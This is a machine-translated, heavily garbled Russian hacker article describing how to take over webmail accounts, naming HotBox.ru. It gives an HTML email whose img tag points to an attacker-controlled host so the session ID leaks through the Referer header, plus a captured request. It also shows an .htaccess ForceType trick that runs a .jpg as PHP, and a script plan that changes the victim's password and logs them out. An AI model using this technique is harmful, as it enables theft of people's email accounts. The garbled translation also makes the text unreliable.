 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
Door in protection: the post web - interface
Today I want to tell to dear public as it is possible to steal addresses from some webs - mails. I have said " as it is possible ", instead of " as it is necessary "! Calm down, anything especially valuable as " the toolkit young khackera " in this note will not be. Simply demonstration of opportunities PHP and lacks (scandalous lacks!) some post webs - interfaces.
A. V. Komlin, Value judgment of the Russian removed post services. Testing for mistakes in the Web - interface. Very useful clause{article}.
Service HotBox. Ru is described.
The first testing has revealed, that the server is subject to the elementary mistakes in kill of scripts and others dangerous tegov, but it appeared not the worst.
As it has already been marked - in an operating time the user is identified on the casual multiple-valued identifier (id), and certainly (thought ja) IP and-or cookies. The test has shown, what is it not so! Having learned{having found out} value id on a box appeared possible{probable} to go from other address, for example after breakage of connection! Moreover it was not required also supports of "pies" (though to learn{find out} them at an opportunity to execute a script a problem was not).
Actually, for the non-authorized viewing a box, it is enough itself to put the elementary program recording the references{manipulations} to 80-mu (or to another specified in the address) port to send the letter, having inserted in him not filtered teg provoking browser on the automatic reference{manipulation} to the machine attacking (for example with the help of the link to a picture ostensibly located on IP the address of a hacker <img src=http: // adres_mashiny_vzlomhhika:port/anyname.gif width=1 height=1>) and, having waited while the victim will go to read a mail to see a field " Referer: " in heading of the come search!
GET/anyname.gif HTTP/1.0
Referer: http: // www.hotbox.ru/message.php? id=b [skip] 14cf*index=6*array_index=5
Connection: Keep-Alive
...
Attacking it are necessary to disconnect only support cookies in the browser, completely to type{collect} specified in Referer the address and in parallel " to work with mail " (to esteem letters to establish transfer...) while the owner will not leave from it{her}.
If the malefactor has no constant connection with a network, he can use dyrkami in kill tegov to establish with the help of languages of scripts transfer (for this purpose it is necessary to send the additional letter with a code of acknowledgement{confirmation}).
Actually, it is possible to put breaking of boxes on a stream and to not watch for victims, sitting on lines.
So, we have post service, which
a) Will authorize users on technology similar to sessions in php.
b) Does not do{Make} check of IP-addresses
v) Does not check contents of letters of a format html
g) Does not demand acknowledgement{confirmations} of changes of system adjustments
And check of contents should consist in addition and in ruthless rezke all pictures which do not go in attachmente, and are caused from other address. ALL PICTURES, ALL!
We, abrupt khackery, use Apache+PHP.
1. We send to different addresses of post service of the letter in a format html with tegom
<img src=http: // www.server.com/picture.jpg>
For example, with a congratulatory card.:)
2. In a directory with a card we put a file .htaccess the following maintenance{contents}:
<Files "picture.jpg">
ForceType application/x-httpd-php
</Files>
3. Instead of a card we write a file picture.jpg with such code:
<?
header (" Content-type: image/gif ");
include ("otkrytka.jpg");
4. And a congratulatory card we put in a file otkrytka.jpg. ForceType directive in .htaccess forces the server to process a file .jpg as a script php which after end of job gives out to the user a picture, and to learn{find out}, that the script there did{made} something, it is impossible. And the script does{makes} a simple thing - assorts a variable, takes a bite therefrom the identifier of session and... In two steps deprives with the user of a box. By the machine of a victim there is nothing, all does{makes} a script on the server of the malefactor:
5. Opens a socket with a web - mail, simulating sending of the form of system adjustments (names of variables it is necessary to write handles), namely change of the password on necessary to the malefactor (and, for example, notifies the author that such box is seized). To not call suspicions, it is possible to form the necessary headings - referery, user agent, etc.
6. Opens the second socket, simulating pressing of the button "output{exit}".
* A socket - network connection. In this case precisely same, as well as connection between the web - server and a browser.
ALL! The USER HAS REMAINED WITHOUT the BOX, not having had time{been in time} as it is necessary to consider a picture. The following, that he will see - the message such as " the wrong password, enter once again ".
It turns out, that dyrka in protection of such post service (not Hotbox.ru, I shall notice, there something all the same is closed) actually - the whole door. The combination of transfer of the identifier of session through the link (i.e. accessible to everybody through field Referer), instead of through cookie and absence of check of the IP-address enables the malefactor to intercept management of a box quickly and easily. Check of pictures here does not rescue - nothing prevents to insert into the text of the letter the link, having pressed on which, the user will pass a script the identifier of session. Whether with> jat convenience of such victims? I think, no.
